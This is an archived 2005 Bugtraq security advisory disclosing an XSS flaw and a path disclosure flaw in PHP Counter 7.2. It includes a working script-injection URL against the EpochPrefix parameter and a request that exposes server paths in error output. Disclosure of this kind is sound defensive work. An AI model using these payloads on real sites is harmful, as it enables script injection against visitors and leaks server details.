[39623] in bugtraq

home help back first fref pref prev next nref lref last post

Path Disclosure and XSS problem in PHP Counter 7.2

daemon@ATHENA.MIT.EDU (priestmaster)
Wed Jul 13 18:50:17 2005

Date: Wed, 13 Jul 2005 12:53:04 +0200
Message-Id: <200507131253.AA790037062@priestmaster.org>
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary="==IMail_v8.1=="
From: "priestmaster" <priest@priestmaster.org>
Reply-To: <priest@priestmaster.org>
To: <bugtraq@securityfocus.com>

------------------------------------------------------------------------
This mail message contains standard MIME attachments.  If you see this
note, your e-mail program does not support MIME.  You may need a MIME-
compliant mail reader to read any non-text attachments in this message.
------------------------------------------------------------------------

--==IMail_v8.1==
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,

I found two vulnerabillities in PHP Counter 7.2

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

First an XSS problem (file phpcounterxss.txt)
Second a Path disclosure vulnerabillity (file phpcounterdir.txt).

greets,

priestmaster

Mail: <priest@priestmaster.org>
URL:  http://www.priestmaster.org 
             

--==IMail_v8.1==
Content-Type: text/plain; name="phpcountxss.txt"
Content-Transfer-Encoding: 7bit

----------------------------------------------------------
---- Team priestmasters PHP Counter 7.2 XSS Advisorie ----
----------------------------------------------------------

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

PHP Counter 7.2 does not filter "<>" tags in EpochPrefix
parameter. Cross site scripting and HTML injection is possible.

Exploitation:

http://www.yourwebsite.org/CounterDirectory/index.php?Plugin=All%20Hits&EpochPrefix="></a></div><script>a=/XSS/%0aalert(a.source)</script>

The injected script is called multiple times.

XSS is hard to do because ' and " are filtered.

greets,

priestmaster

URL:   http://www.priestmaster.org
Email: priest@priestmaster.org

--==IMail_v8.1==
Content-Type: text/plain; name="phpcountdir.txt"
Content-Transfer-Encoding: 7bit

------------------------------------------------------------
-------- Team priestasters PHP Counter 7.2 Advisorie -------
---------------- Path disclosure vulnerabillity ------------
------------------------------------------------------------

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

A Path disclosure vuln exist in prelims.php
Exploitation is simple:

http://www.yoursite.com/CounterPath/prelims.php

Output look like this:

Fatal error: Call to undefined function: getdawn()
in /home/.sites/165/site223/web/Counter/prelims.php on line 63

That's all :-)

priestmaster

--==IMail_v8.1==--

home help back first fref pref prev next nref lref last post